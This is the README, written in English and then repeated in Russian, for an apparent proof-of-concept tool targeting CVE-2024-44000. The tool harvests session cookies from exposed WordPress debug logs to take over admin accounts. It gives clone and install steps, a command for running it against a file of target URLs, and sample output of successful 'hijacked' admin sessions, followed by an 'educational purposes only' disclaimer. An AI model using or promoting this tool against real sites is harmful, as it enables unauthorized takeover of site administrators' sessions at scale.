GenCookieSessionHijack is a PoC tool designed to exploit insecurely exposed debug logs from WordPress sites and extract session cookies. This allows the attacker to hijack active admin sessions and gain unauthorized access to the WordPress admin dashboard.
- Extract cookies from WordPress debug logs.
- Identify and filter session cookies (e.g.,
wordpress_logged_in
). - Automatically attempt session hijacking for admin access.
- Open the hijacked admin session directly in the browser.
git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt
- Prepare a list of target WordPress URLs in a file, one per line (e.g.,
list.txt
). - Run the tool using the following command:
python GenCookieSessionHijack.py -f list.txt -o result.txt
-f, --file
: Path to the file containing the list of URLs (default:list.txt
).-o, --output
: File to save the results (default:result.txt
).
python GenCookieSessionHijack.py -f targets.txt -o output.txt
This will read the list of URLs from targets.txt
, attempt to extract and use session cookies, and save the results to output.txt
.
If the session hijacking attempt is successful, the tool will generate a URL with the hijacked admin session cookie and open it directly in the default browser.
[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie
[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404
This tool is intended for educational purposes only and should not be used for illegal activities. The author is not responsible for any misuse or damage caused by this tool.
GenCookieSessionHijack — это PoC скрипт, созданный для эксплуатации уязвимо раскрытых отладочных логов на сайтах WordPress с целью извлечения сессионных cookies. Это позволяет злоумышленнику перехватить активные сеансы администратора и получить несанкционированный доступ к панели администрирования WordPress.
- Извлечение cookies из отладочных логов WordPress.
- Идентификация и фильтрация сессионных cookies (например,
wordpress_logged_in
). - Автоматическая попытка захвата сеанса для доступа в админку.
- Открытие захваченного сеанса администратора непосредственно в браузере.
git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt
- Подготовьте файл со списком целевых URL WordPress, по одному на строку (например,
list.txt
). - Запустите программу следующей командой:
python GenCookieSessionHijack.py -f list.txt -o result.txt
-f, --file
: Путь к файлу со списком URL (по умолчанию:list.txt
).-o, --output
: Файл для сохранения результатов (по умолчанию:result.txt
).
python GenCookieSessionHijack.py -f targets.txt -o output.txt
Это прочитает список URL из targets.txt
, попытается извлечь и использовать сессионные cookies, и сохранит результаты в output.txt
.
Если попытка захвата сеанса успешна, инструмент сгенерирует URL с захваченным сессионным cookie администратора и откроет его непосредственно в браузере.
[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie
[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404
Этот инструмент предназначен исключительно для образовательных целей и не должен использоваться для незаконных действий. Автор не несет ответственности за любое неправомерное использование или ущерб, вызванный этим инструментом.